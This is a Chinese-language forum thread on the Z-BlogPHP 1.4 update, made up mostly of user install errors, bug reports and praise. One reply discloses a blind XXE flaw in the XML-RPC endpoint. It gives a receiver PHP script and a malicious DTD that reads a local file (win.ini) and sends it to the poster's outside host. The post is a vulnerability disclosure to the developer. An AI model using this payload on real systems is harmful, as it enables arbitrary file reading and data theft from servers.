ZBlogger技术交流中心

 找回密码
 注册

QQ登录

只需一步,快速开始

Z-BlogPHP 最新开发动态 下载最新版:Z-BlogPHP 1.5 Zero Wordpress转换 - Emlog转换 - 找回密码

Z-BlogASP 最新开发动态 下载最新版:Z-Blog 2.2 Prism Build 140101 转换到Z-BlogPHP - 1.8升级指南 - 找回密码

DBS官方主机/域名/VPS 推荐:Z-BlogPHP主机-Z-BlogASP主机 联系值班客服(每天9:00-21:30)

搜索
【聚划算】宅男最新神器!你懂的!环球外贸论坛
楼主: 未寒

Z-BlogPHP 1.4 Deeplue Build 150101更新版!!!

[复制链接]
发表于 2015-5-13 15:44:05 | 显示全部楼层
index header模板改变了,后台点 [清空缓存并重新编译模板] 没反应
回复 支持 反对

使用道具 举报

发表于 2015-5-16 16:39:54 | 显示全部楼层
如果不擅长install文件夹会怎样啊 我发现很多人没有这个习惯
回复 支持 反对

使用道具 举报

发表于 2015-5-20 23:29:52 | 显示全部楼层
求救!!!Z-blog PHP安装出现这个错误了。。。怎么破?

错误信息

(2)E_WARNING : mysql_query() expects parameter 2 to be resource, boolean given (set_error_handler) (150101) (WINNT; Apache2.2.21; PHP 5.3.10; mysql; fsockopen)
回复 支持 反对

使用道具 举报

发表于 2015-5-25 21:28:29 | 显示全部楼层
功能很强大,我很喜欢
回复 支持 反对

使用道具 举报

发表于 2015-5-30 15:28:44 | 显示全部楼层
好长时间没来了,
回复 支持 反对

使用道具 举报

发表于 2015-6-7 14:10:46 | 显示全部楼层
很喜欢这个程序。
回复 支持 反对

使用道具 举报

发表于 2015-6-10 09:53:10 | 显示全部楼层
顶一个 赞 继续 学习 学习啊
回复 支持 反对

使用道具 举报

发表于 2015-6-27 17:45:52 | 显示全部楼层
不错不错。。。太牛掰
回复 支持 反对

使用道具 举报

发表于 2015-6-29 04:11:25 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2015-7-4 16:57:39 | 显示全部楼层
不错
支持z-blog
回复 支持 反对

使用道具 举报

发表于 2015-7-15 02:07:22 | 显示全部楼层
用的人多吗?
回复 支持 反对

使用道具 举报

发表于 2015-7-29 10:14:27 | 显示全部楼层
后台打开了,账号密码输入进不去,,登陆失败什么情况,大神指点一下。
错误信息

(0)UNKNOWN : 登录失败 (set_exception_handler) (150101) (Linux; nginx1.8.0; PHP 5.4.41; mysql; curl)
回复 支持 反对

使用道具 举报

发表于 2015-8-17 11:24:51 | 显示全部楼层
支持一下,刚从其他cms转过来。
回复 支持 反对

使用道具 举报

发表于 2015-8-20 09:25:35 | 显示全部楼层
本帖最后由 xiaofengfeng 于 2015-8-20 09:29 编辑

@未寒

/zb_system/xml-rpc/index.php 641行:

code 区域$zbp->Load();

Add_Filter_Plugin('Filter_Plugin_Zbp_ShowError','RespondError');

$xmlstring = file_get_contents( 'php://input' );
//Logs($xmlstring);
$xml = simplexml_load_string($xmlstring);



可见,这里直接调用simple_load_string解析XML,造成了一个XML实体注入。

但观察后面的代码发现,需要用户、密码才能执行一些操作,得到回显,否则会报错。

没有回显的情况下,我们怎么来利用XXE,这里就说到一个blind xxe,在这篇文章都有详细的说明:

http://www.7ftx.xyz /web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html

所以原理什么的我就不细说了,实际上我也是一知半解。主要看利用方法。



先在我主机上放一个接收文件的php(http://www.7ftx.xyz /xxe/get.php):

code 区域<?php
file_put_contents('01.txt', $_GET['xxe_local']);
?>



目的是将$_GET['xxe_local']存入本地文件01.txt。然后再构造一个xml,也保存在我的主机上,这个XML实际上就是真正读取文件的XML:

code 区域<!ENTITY % payload        SYSTEM         "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://www.7ftx.xyz/xxe/get.php?xxe_local=%payload;'>">
%int;
%trick;



我们看到这个XML,他引用了外部实体c:/windows/win.ini作为payload的值,然后又将payload拼接到 http://www.7ftx.xyz/xxe/get.php?xxe_local=%payload;,进行HTTP请求。


接收到请求的get.php就将这个文件内容保存到01.txt了,形成了一个文件读取的过程。

然后,我们向/zb_system/xml-rpc/index.php发包,让它来加载上面这个XML:



发包过去后,就会请求我们的evil_php.xml,解析这个xml造成XXE攻击,读取c:/windows/win.ini并进行base64编码后传给get.php,最后保存在我们的主机上:






用Blind XXE造成一个任意文件读取漏洞。


漏洞证明:




回复 支持 反对

使用道具 举报

发表于 2015-8-29 07:12:53 | 显示全部楼层
expecting T_CONSTANT_ENCAPSED_STRING or '(' (register_shutdown_function) (150101) (Linux; Apache; PHP 5.2.17; mysqli; curl)  怎么解决 后台首页都打不开了
回复 支持 反对

使用道具 举报

发表于 2015-9-2 11:25:15 | 显示全部楼层
php版试一下安装,看看效果
回复 支持 反对

使用道具 举报

发表于 2015-9-6 16:49:02 | 显示全部楼层
本帖最后由 Howitworks 于 2015-9-7 11:28 编辑

文章置顶后,在分类下不显示该文章,是bug吗?
回复 支持 反对

使用道具 举报

发表于 2015-9-8 11:45:34 | 显示全部楼层
太牛掰了  强烈支持1
回复 支持 反对

使用道具 举报

发表于 2015-9-19 21:35:11 | 显示全部楼层
关键词和网站描述没有地方修改啊
回复 支持 反对

使用道具 举报

发表于 2015-10-2 20:13:27 | 显示全部楼层
回复也是一种美德。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|ZBlogger技术交流中心 ( 鄂ICP备11007414号 鄂公网安备 42060602000101号 )

GMT+8, 2019-1-16 20:51 , Processed in 0.030863 second(s), 5 queries , APCu On.

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表